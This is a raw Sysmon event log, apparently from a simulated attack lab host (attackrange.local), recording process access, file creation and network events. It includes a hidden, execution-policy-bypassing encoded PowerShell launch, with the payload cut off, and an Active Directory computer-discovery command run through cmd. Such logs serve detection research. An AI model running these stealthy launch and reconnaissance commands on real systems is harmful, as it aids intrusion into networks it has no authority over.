18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035085899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.047{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56776-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:21.051{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58A20EF8DF532E08344DB986C90EC73F,SHA256=5E451E37623D4F5D6DDF4CD9BCC906E84B813E053CBA84BDDD24D80B1ADA1B75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.219{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.219{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.187{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.187{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000035085923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-09 18:17:22.168{B81B27B7-4FB2-613A-7690-03000000C801}2616\PSHost.132756850420659695.2616.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035085922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.150{B81B27B7-4FB2-613A-7690-03000000C801}2616ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_fuegylxd.cq0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.150{B81B27B7-4FB2-613A-7690-03000000C801}2616ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_d5mu5osn.xof.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035085920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.119{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_d5mu5osn.xof.ps12021-09-09 18:17:22.119 10341000x800000000000000035085919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.103{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035085918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:46.246{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56777-false10.0.1.12-8000- 23542300x800000000000000035085917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.071{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F11E9641E7E7FA17D425CB2A78BC071,SHA256=9635D647AFDA21337149E33A70A913A748E0C5F21F82C1C9AF03B8C3A2686EEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.069{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.066{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.066{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.066{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.066{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.066{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.050{B81B27B7-4FB2-613A-7590-03000000C801}66162108C:\Windows\system32\cmd.exe{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.065{B81B27B7-4FB2-613A-7690-03000000C801}2616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe get-wmiobject -class ds_computer -namespace root\directory\ldapC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-4FB2-613A-7590-03000000C801}6616C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe get-wmiobject -class ds_computer -namespace root\directory\ldap 10341000x800000000000000035085908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.050{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4FB2-613A-7590-03000000C801}6616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.050{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.050{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.050{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.050{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.050{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-4FB2-613A-7590-03000000C801}6616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.050{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4FB2-613A-7590-03000000C801}6616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:22.057{B81B27B7-4FB2-613A-7590-03000000C801}6616C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe get-wmiobject -class ds_computer -namespace root\directory\ldapC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e 